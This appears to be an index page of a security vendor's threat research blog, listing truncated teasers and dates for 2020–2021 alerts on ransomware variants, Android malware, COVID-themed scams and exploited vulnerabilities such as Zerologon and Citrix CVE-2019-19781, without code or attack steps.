The SonicWall Capture Labs threat research team has observed reports of a variant from the Crysis/Dharma ransomware family called Lotus. The operators of this malware charge 1 BTC ($49K USD at the time of writing this alert) for […]
Posted: March 5, 2021
Observing modifications in the techniques being used to distribute ZLoader using MS-Excel file
Posted: February 26, 2021
A critical remote code execution vulnerability has been reported in VMware’s vSphere/vCenter. The vulnerability is due to improper validation of paths in an uploaded tarball. A remote, unauthenticated attacker could exploit this vulnerability by sending […]
Posted: February 26, 2021
The SonicWall Capture Labs Threat Research team observed reports of a new variant family of Parasite ransomware actively spreading in the wild. The Parasite ransomware encrypts the victim’s files with a strong encryption algorithm until […]
Posted: February 18, 2021
This Android banker contains a multitude of malicious capabilities
Posted: February 18, 2021
SonicWall Capture Labs threat research team observed attacks exploiting old vulnerability in Netgear DGN devices.
Posted: February 12, 2021
Obfuscation is a commonly used technique by malware authors to render their code unreadable to prevent easy interpretation of the program that might give clues on their intent or behavior. This week, the Sonicwall Capture […]
Posted: February 9, 2021
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of February 2021.
Posted: February 5, 2021
The SonicWall Capture Labs threat research team has observed reports of a variant of Paradise ransomware called Cukiesi. This ransomware family has been around since early 2018 and is reported to have originated from Russia. […]
Posted: January 14, 2021
The SonicWall Capture Labs Threat Research team observed reports of a new variant family of Babuk ransomware actively spreading in the wild. The Babuk ransomware encrypts the victim’s files with a strong encryption algorithm until […]
Posted: January 12, 2021
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of January 2021.
Posted: January 8, 2021
Overview: SonicWall Capture Labs Threat Research Team recently found a new sample and activity for a Turla variant called GoldenSky. Turla has many names since 2014, aka: Turla, Snake, Venomous Bear, VENOMOUS Bear, Group 88, […]
Posted: January 6, 2021
Fake Cyberpunk apps are on the rise
Posted: January 3, 2021
CVE-2020-1472 Zerologon – A vulnerability in the cryptography of Microsoft’s Netlogon process that allows an attack against Microsoft Active Directory domain controllers, making it possible for a hacker to impersonate any computer, including the root […]
Posted: December 23, 2020
SonicWall Capture Labs Threat Research team has observed hackers actively targeting the recent remote code execution vulnerability in the Apache Struts framework. This vulnerability is due to insufficient input validation, leading to a forced double […]
Posted: December 18, 2020
The SonicWall Capture Labs Threat Research team observed reports of a new variant family of Mobef ransomware actively spreading in the wild. The Mobef ransomware encrypts the victim’s files with a strong encryption algorithm just […]
Posted: December 14, 2020
Updated January 15, 2021 The U.S. Department of Homeland Security (DHS) and the Cybersecurity and Infrastructure Security Agency (CISA) have confirmed that malicious threat actors have been and are actively exploiting vulnerabilities in SolarWinds Orion […]
Posted: December 10, 2020
On December 8, 2020, Cyber Security Firm FireEye disclosed an incident that resulted in theft of their offensive security tools (OSTs) used by their Red-Team to test the security posture of their customers. Some of […]
Posted: December 9, 2020
Contains a number of hardcoded components as well
Posted: December 8, 2020
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of December 2020.
Posted: December 7, 2020
Overview: SonicWall Capture Labs Threat Research Team recently found a new sample and activity for Egregor Ransomware. The Egregor sample below is a library (DLL) that contains code and data that can be used by […]
Posted: December 4, 2020
Extracts sensitive information from user in exchange of fake promises
Posted: December 4, 2020
The Sonicwall Capture Labs Research team has observed another ransomware being circulated in the wild recently. It was first spotted earlier this year but has not gained much traction then. Interestingly, this not so popular […]
Posted: November 25, 2020
SonicWall Capture Labs Threat Research team has observed that the recent remote code execution vulnerability reported in Oracle WebLogic Server being exploited in the wild. This vulnerability is due to improper sanitization of user-supplied data […]
Posted: November 25, 2020
The SonicWall Capture Labs threat research team has observed reports of Hungarian PC users infected by Exerwa ransomware. It is reported that Exerwa is CTF malware that emerged from a Capture-the-Flag event where hackers are […]
Posted: November 20, 2020
The SonicWall Capture Labs Threat Research team observed reports of a new variant family of LOCKDOWN ransomware actively spreading in the wild. The LOCKDOWN ransomware encrypts the victim’s files with a strong encryption algorithm until […]
Posted: November 19, 2020
SonicWall Capture Labs threat research team observed attacks exploiting old vulnerabilities in Dasan GPON home routers.
Posted: November 12, 2020
Bahamut campaign aims at stealing sensitive user information from the device
Posted: November 10, 2020
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of November 2020.
Posted: November 6, 2020
Overview: SonicWall Capture Labs Threat Research Team recently found a new sample and activity for Ragnar Locker Ransomware. Cyberattacks using Ragnar Ransomware have impacted Biological E Ltd, Capcom, and Campari Group. A description of the […]
Posted: November 5, 2020
As the world watches for the outcome of the U.S. election and election night turns into election days, cybercriminals are riding the wave using social engineering tactics. The Sonicwall Capture Labs Research team has analyzed […]
Posted: October 30, 2020
WordPress is a free and open-source content management system written in PHP. WordPress is used by more than 60 million websites. 38% of the web is built on WordPress. Its plugin architecture allows users to extend […]
Posted: October 26, 2020
This new variant has a number of measures against emulator based execution
Posted: October 22, 2020
SonicWall Capture Labs threat research team has observed attacks exploiting command injection vulnerabilities in AVTECH devices
Posted: October 22, 2020
The SonicWall Capture Labs Threat Research Team observed reports of a new variant family of NIBIRU ransomware [NIBIRU.RSM] actively spreading in the wild. The NIBIRU ransomware encrypts the victim’s files with a strong encryption algorithm […]
Posted: October 16, 2020
Does not appear to be for research purposes
Posted: October 13, 2020
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of October 2020.
Posted: October 9, 2020
Overview: SonicWall Capture Labs Threat Research Team recently found a new sample and activity for Emotet. Emotet is an advanced, self-propagating modular malware. Historically, Emotet was a advanced banking malware with botnet capabilities and indicators. […]
Posted: October 4, 2020
SonicWall Capture Labs Threat Research team observes attackers actively exploiting the arbitrary remote code execution vulnerability reported in Tenda AC15 router. Tenda AC15 AC1900AC15 is an AC1900 Smart Dual-band Gigabit Wi-Fi Router designed for smart […]
Posted: October 2, 2020
The SonicWall Capture Labs threat research team have observed a new variant from the Phobos ransomware family. Like Sodinokibi, Phobos is sold on the criminal underground using the ransomware-as-a-service (RaaS) model. It is spread using […]
Posted: September 25, 2020
SonicWall Capture Labs Threat Research team observes attackers actively exploiting the recent remote code execution vulnerability reported in vBulletin. VBulletin is a popular forum software used by about 20,000 websites. It is written in PHP and uses the MySQL database. CVE-2020-17496 | Vulnerability: A remote code execution vulnerability has been reported in […]
Posted: September 25, 2020
The SonicWall Capture Labs threat research team observed reports of a new variant family of Zhen ransomware [Zhen.RSM] actively spreading in the wild. The Zhen ransomware encrypts the victim’s files with a strong encryption algorithm […]
Posted: September 17, 2020
An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC)
Posted: September 16, 2020
Sends sensitive victim information from the device
Posted: September 9, 2020
This week the Sonicwall Capture Labs research team analyzed an infostealing Trojan that is a mash up of another infostealer Trojan and a ransomware. This Trojan, is called Anubis but borrowed most of its code from […]
Posted: September 8, 2020
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of September 2020.
Posted: September 4, 2020
Overview: SonicWall Capture Labs Threat Research Team recently found a new sample and activity for: ECCENTRIC BANDWAGON, DPRK. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. North […]
Posted: September 4, 2020
The SonicWall Capture Labs threat research team observed reports of a new variant family of Jackpot ransomware [Jackpot.RSM] actively spreading in the wild. The Jackpot ransomware encrypts the victim’s files with a strong encryption algorithm […]
Posted: August 28, 2020
The SonicWall Capture Labs threat research team have observed a new family of ransomware called Darkside. The operators of this ransomware primarily target large corporations. Recently, a Canadian land developer and home builder, Brookfield Residential […]
Posted: August 27, 2020
Advantech WebAccess/NMS is a web browser-based software package for networking management systems (NMS). It is designed with SNMP and ICMP communication standards for managing all Ethernet-Enabled Advantech products and third-parties devices. NMS can bring users an […]
Posted: August 21, 2020
This spyware steals a lot of sensitive victim information
Posted: August 20, 2020
Improper access control in Citrix ADC and Citrix Gateway allows unauthenticated access to certain URL endpoints.
Posted: August 14, 2020
The popular social media app TikTok is getting banned in a number of countries. Fraudsters are using this opportunity to spread fake TikTok apps in an effort to infect and scam more victims. SonicWall Capture […]
Posted: August 14, 2020
The SonicWall Capture Labs threat research team observed reports of a new variant family of VoidCrypt ransomware [VoidCrypt.RSM] actively spreading in the wild. The VoidCrypt ransomware encrypts the victim’s files with a strong encryption algorithm […]
Posted: August 11, 2020
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of August 2020.
Posted: August 7, 2020
Overview: SonicWall Capture Labs Threat Research Team recently observed activity for the Chinese Remote Access Trojan Taidoor. Taidoor is composed of two stages, the loader and RAT module. The loader starts the service and decrypts […]
Posted: August 7, 2020
The Sonicwall Capture Labs Research team has come across a Chinese word processor that comes packaged with an infostealer. This word processor comes as a Nullsoft installer and appears to be a legitimate notepad or […]
Posted: July 31, 2020
BIG-IP F5’s BIG-IP is a product family comprises software, hardware, and virtual appliances designed around application availability, access control, and security solutions. BIG-IP software products run on top of F5’s Traffic Management Operation System® (TMOS), […]
Posted: July 31, 2020
The SonicWall Capture Labs threat research team have observed reports of new ransomware named Exorcist. It is reported to have surfaced over the past week on an underground Russian forum using the ransomware-as-a-service (RaaS) model with […]
Posted: July 23, 2020
Command-injection vulnerabilities(CVE-2020-14472) exists in the mainfunction.cgi file in Draytek Vigor3900, Vigor2960, and Vigor 300B devices before 1.5.1.1 . This can lead to remote code execution.
Posted: July 23, 2020
The SonicWall Capture Labs threat research team observed reports of a new variant family of Reha ransomware [Reha.RSM] actively spreading in the wild. The Reha ransomware encrypts the victim’s files with a strong encryption algorithm […]
Posted: July 17, 2020
SonicWall RTDMI engine recently detected an Android malware which pretends to look like a CoViD info app and has functionalities of Banking Trojan, Spyware, Keylogger and Ransomware.
Posted: July 16, 2020
Dialers, RATS and apps with suspicious functionalities were observed using the Covid theme
Posted: July 14, 2020
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of July 2020.
Posted: July 14, 2020
A remote code execution vulnerability exists in Windows Domain Name System servers when they fail to properly handle requests .
Posted: July 10, 2020
Overview: SonicWall Capture Labs Threat Research Team recently observed new activity for Valak. The Valak malware campaign is usually found lurking inside your email inbox or spam folder. The distribution of Valak is attached to […]
Posted: July 10, 2020
The pandemic has brought the world to a standstill but has not wavered the cybercriminals. It has been a boon to malware authors and has provided a platform to exploit. The Sonicwall Capture Labs Research […]
Posted: July 6, 2020
These improvements focus towards making the malware more stealthy
Posted: July 3, 2020
SonicWall Capture Labs Threat Research team has come across a new malspam campaign, that pretends to be a legitimate pdf but installs malware on the victim’s computer. When a user opens this PDF, they will be […]
Posted: July 1, 2020
The SonicWall Capture Labs threat research team have observed reports of ransomware that encrypts files and appends a “.BadBoy” extension to their names. This variant of the malware is new but is based on Spartacus […]
Posted: June 27, 2020
SonicWall Capture Labs Threat Research team observed attackers actively targeting Zyxel NAS (Network Attached Storage) and firewall products affected by a remote code execution vulnerability. Vulnerability | CVE-2020-9054 A NAS system is a storage device […]
Posted: June 25, 2020
The SonicWall Capture Labs threat research team observed reports of a new variant family of COBRALOCKER ransomware [COBRALOCKER.RSM] actively spreading in the wild. The COBRALOCKER ransomware encrypts the victim’s files with a strong encryption algorithm […]
Posted: June 22, 2020
An Android finance app has been uncovered that victimizes its users
Posted: June 18, 2020
Sonicwall Capture Labs threat research team observed Zorab ransomware posing as DJVU ransomware decryptor .
Posted: June 17, 2020
This simple Android locker now uses Coronavirus theme
Posted: June 12, 2020
Black Lives Matter protests have spread across the United States and worldwide. The core of the protests have been activists taking to the streets but in this very online age while also amidst a pandemic, […]
Posted: June 9, 2020
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of June 2020.
Posted: June 5, 2020
Overview: SonicWall, Capture Labs Threat Research Team; observed new activity from MUSTANG PANDA, using a unique infection chain related to the PlugX Trojan. The legitimate vulnerable binary is part of Adobe’s Suite which will load […]
Posted: June 5, 2020
Malware authors are using scams with attractive headlines such as – Flipkart lock down sale, Paytm limited period offer.
Posted: June 5, 2020
The SonicWall Capture Labs threat research team have observed reports of spam inviting people to view an “image” in which the email states they are present. The “image”, which in our case was named IMG148150.jpg.js is […]
Posted: June 5, 2020
The SonicWall Capture Labs threat research team have observed reports of spam inviting people to view an “image” in which they are supposedly present. The “image”, which in our case was named IMG148150.jpg.js is actually a […]
Posted: June 5, 2020
This threat continues to evolve
Posted: May 29, 2020
An insecure deserialization vulnerability has been reported in Oracle Weblogic. This vulnerability is due to insufficient validation of user requests. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to a […]
Posted: May 28, 2020
The SonicWall Capture Labs Threat Research Team observed reports of a new variant family of DragonCyber ransomware [DRAGON.RSM] actively spreading in the wild. The DragonCyber ransomware encrypts the victim’s files with a strong encryption algorithm […]
Posted: May 26, 2020
This coin-miner contains a number of components that work together
Posted: May 22, 2020
SonicWall Capture Labs threat research team observed Infostealer Trojan hiding in Covid-19 related email attachments.
Posted: May 20, 2020
These apps contain code related to Android spyware SpyNote
Posted: May 16, 2020
This week the Sonicwall Capture Labs research team received yet another Trojan capitalizing on the current Covid-19 pandemic. As more and more states require citizens to wear masks in public, it was inevitable that malware authors […]
Posted: May 12, 2020
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of May 2020.
Posted: May 8, 2020
Overview: SonicWall Capture Labs Threat Research Team has observed and trapped activity for the malware family called “Zeus Sphinx” banking Trojan. Sphinx, goes by many other names; as in ZLoader, Terdot, or DELoader. ZLoader, has […]
Posted: May 8, 2020
The SonicWall Capture Labs threat research team have come across new ransomware known to the antivirus community as Instabot. It is actively spreading and the webserver used by the operators is currently online at the […]
Posted: May 4, 2020
The SonicWall Capture Labs Threat Research Team observed reports of a new variant family of PROJECTZORGO ransomware [PROJECTZORGO.RSM] actively spreading in the wild. The PROJECTZORGO ransomware has been specially designed by a team of underground […]
Posted: May 4, 2020
SonicWall Capture Labs Threat Research team has come across a new variant of Raccoon stealer (V1.5) that was used in a malicious COVID-19 campaign. While we wear masks to defend against coronavirus, a bandit masked raccoon seeks to take advantage of the coronavirus outbreak. Infection Cycle As with several other attacks, this campaign […]
Posted: April 23, 2020
SonicWall Capture Labs threat research team observed scams related to CoVid-19 in recent weeks.
Posted: April 23, 2020
Malicious Android apps using the name and icon of Zoom app surface during the lock-down
Posted: April 18, 2020
With stay-at-home orders implemented in several states and cities in the country in an effort to slow the spread of the novel coronavirus, internet data usage has spiked with more people being online and confined […]
Posted: April 14, 2020
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of April 2020.
Posted: April 13, 2020
SonicWall RTDMI ™ engine detected the NetWire RAT the same day it was created and spread. The RAT is using AMSI bypassing module and Rzy Protector module.
Posted: April 13, 2020
Since the CoViD19 pandemic started, we have been seeing various malware families cashing in on the Covid scare for its distribution. Earlier, we had also posted an alert about the families milking this pandemic. Beware […]
Posted: April 10, 2020
The SonicWall Capture Labs threat research team have come across a new ransomware family known as Ada Covid. The sample we analysed appears to be in early stages of development and does not modify any […]
Posted: April 10, 2020
Overview: SonicWall Capture Labs Threat Research Team recently found a new sample and activity in April for a downloader called GuLoader. GuLoader is used in conjunction with other malware components such as RATs (Remote Administration […]
Posted: April 8, 2020
Excel 4.0 macro being used to deliver Malware
Posted: April 3, 2020
UPDATED APRIL 8TH Scammers have devised numerous ways of defrauding people in connection with COVID-19. Some examples of scams linked to COVID-19 include treatment, testing, medical supplies, insurance, charity, work from home, investment, student loan, […]
Posted: April 2, 2020
The SonicWall Capture Labs threat research team observed reports of a new variant family of PROJECT23 ransomware [PROJECT23.RSM] actively spreading in the wild. The PROJECT23 ransomware encrypts the victim’s files with a strong encryption algorithm […]
Posted: March 31, 2020
A Trojan that overwrites the MBR
Posted: March 28, 2020
SonicWall Capture Labs Threat Research team has come across another variant of Metamorfo banking trojan that tries to take advantage of the global crisis due to COVID-19 pandemic. This malware was first seen 2 days […]
Posted: March 25, 2020
Another CoronaVirus related app with malicious capabilities
Posted: March 23, 2020
This ransomware uses scare tactics to lure victims into paying the ransom
Posted: March 20, 2020
As the Corona virus pandemic unfolds, the Sonicwall Capture labs Research team also observe an increasing amount of malicious software actively exploiting this crisis. As we have previously reported, we have seen different malware families […]
Posted: March 20, 2020
The malware started using a new technique which redirects bitcoin transaction to malware author’s bitcoin address.
Posted: March 19, 2020
SonicWall Capture Labs Threat Research Team recently found a new RekenSom Ransomware. Injection Cycle. At the onset of execution, a named mutex “Rekensom” is created to ensure only one instance of the sample is running. […]
Posted: March 19, 2020
SonicWall Capture Labs Threat Research Team has observed a ransomware taking advantage of the Coronavirus fear.
Posted: March 19, 2020
Malware authors are misusing Coronavirus disease (COVID-19) pandemic scare to get into the victim’s machine.
Posted: March 17, 2020
This blog entry contains a constantly updated list of CoronaVirus related threats covered by the SonicWall Capture Labs Threats Research team: Android CoronaVirus Ransomware comes bundled with decryption code (March 23, 2020) IOCs: d1d417235616e4a05096319bb4875f57 GAV […]
Posted: March 17, 2020
Grandoreiro banking trojan is wildly active in Latin America and Europe which is now abusing Google Sites to host its C&C server address.
Posted: March 16, 2020
Overview: SonicWall Capture Labs Threat Research Team recently found a new sample and activity in March for the “Corona-virus” binary below. Malware authors have taken advantage of the public’s desire for information on the COVID-19 […]
Posted: March 14, 2020
Websites that claim to contain CoronaVirus related information lead to download of Android RAT
Posted: March 13, 2020
A scareware that spreads using the name of Covid-19
Posted: March 13, 2020
The SonicWall Capture Labs Threat Research Team have been observing a family of ransomware called Ouroboros. The malware became prominent around late 2019 and has undergone various transformations over the last few months. It is based […]
Posted: March 12, 2020
A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests.
Posted: March 10, 2020
SonicWall Capture Labs Threat Research Team has analyzed and addressed Microsoft’s security advisories for the month of March 2020.
Posted: March 6, 2020
Overview: SonicWall Capture Labs Threat Research Team recently found a new sample and activity in March for the GigaCLR Trojan binary. It starts out as a self-extracting native executable, drops two binaries. One a .NET […]
Posted: March 5, 2020
The SonicWall Capture Labs Threat Research Team observed reports of a new variant family of MARRACRYPT ransomware [MARRACRYPT.RSM] actively spreading in the wild. The MARRACRYPT ransomware encrypts the victim’s files with a strong encryption algorithm […]
Posted: February 29, 2020
SonicWall Capture Labs Threat Research team observes attackers actively probing for vulnerable Microsoft Exchange servers. Vulnerability | CVE-2020-0688: A remote code execution vulnerability has been reported in Microsoft Exchange Server. The weakness is due to […]
Posted: February 26, 2020
Android RAT spreads under the name Coronavirus
Posted: February 22, 2020
The Sonicwall Capture Labs Threat Research team has analyzed a malware purporting to be an installer of a popular VPN software. This is not the first time that malware has pretended to be a VPN […]
Posted: February 21, 2020
A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka ‘Scripting Engine Memory Corruption Vulnerability’
Posted: February 14, 2020
The SonicWall Capture Labs Threat Research Team have recently come across a new variant of Ako ransomware. The malware spreads via spam email and shares similarities to MedusaLocker. This has lead many to believe that the […]
Posted: February 11, 2020
SonicWall Capture Labs Threat Research Team has analyzed and addressed Microsoft’s security advisories for the month of Feburary 2020.
Posted: February 8, 2020
Overview: SonicWall Capture Labs Threat Research Team analyzed a new sample found in (Feb. 2020) for a project named: “Androm” a backdoor Trojan. Trojans appear to contain benign or useful functionality, but also contain code […]
Posted: February 7, 2020
The SonicWall Capture Labs Threat Research Team observed reports of a new variant family of ENC ransomware [ENC.RSM] actively spreading in the wild. The ENC ransomware encrypts the victim’s files with a strong encryption algorithm […]
Posted: February 6, 2020
VBscript files are being used for executing DanaBot on victim’s machine, which are delivered as an email attachment inside archive file.
Posted: February 5, 2020
The world is fighting against this deadly coronavirus and running various awareness campaigns and sharing document related to precautionary measures. Cyber threat actors are taking this as an opportunity to get benefits from the fear of people by distributing malware files and claiming them as awareness supporting document for the coronavirus.
Posted: February 1, 2020
Linear eMerge E3: Nortek Security & Control, LLC (NSC) is a leader in wireless security, home automation, and personal safety systems and devices. Nortek Security and Control LLC’s Linear eMerge E3 is an access controller that specifies […]
Posted: January 30, 2020
Android adware that is different from other
Posted: January 28, 2020
Maze ransomware with anti analysis techniques
Posted: January 28, 2020
Fake Antivirus apps detect risky apps based on static json files
Posted: January 24, 2020
Citrix NetScaler ADC/Gateway Directory Traversal Vulnerability CVE-2019-19781 is being actively exploited in the wild.
Posted: January 24, 2020
This week, the SonicWall Capture Labs Threat Research Team came across another cryptominer that pretends to be a media player and even loads a wav file to hide its real intent. Infection Cycle: This Trojan comes […]
Posted: January 17, 2020
The Sonicwall CaptureLabs Threats Research team have observed a newly released version of Cryakl ransomware. First seen in early 2014 spreading via email, Cryakl works like most ransomware by encrypting files and demanding a ransom […]
Posted: January 14, 2020
SonicWall protects its customer against the latest Windows CryptoAPI Spoofing Vulnerability CVE-2020-0601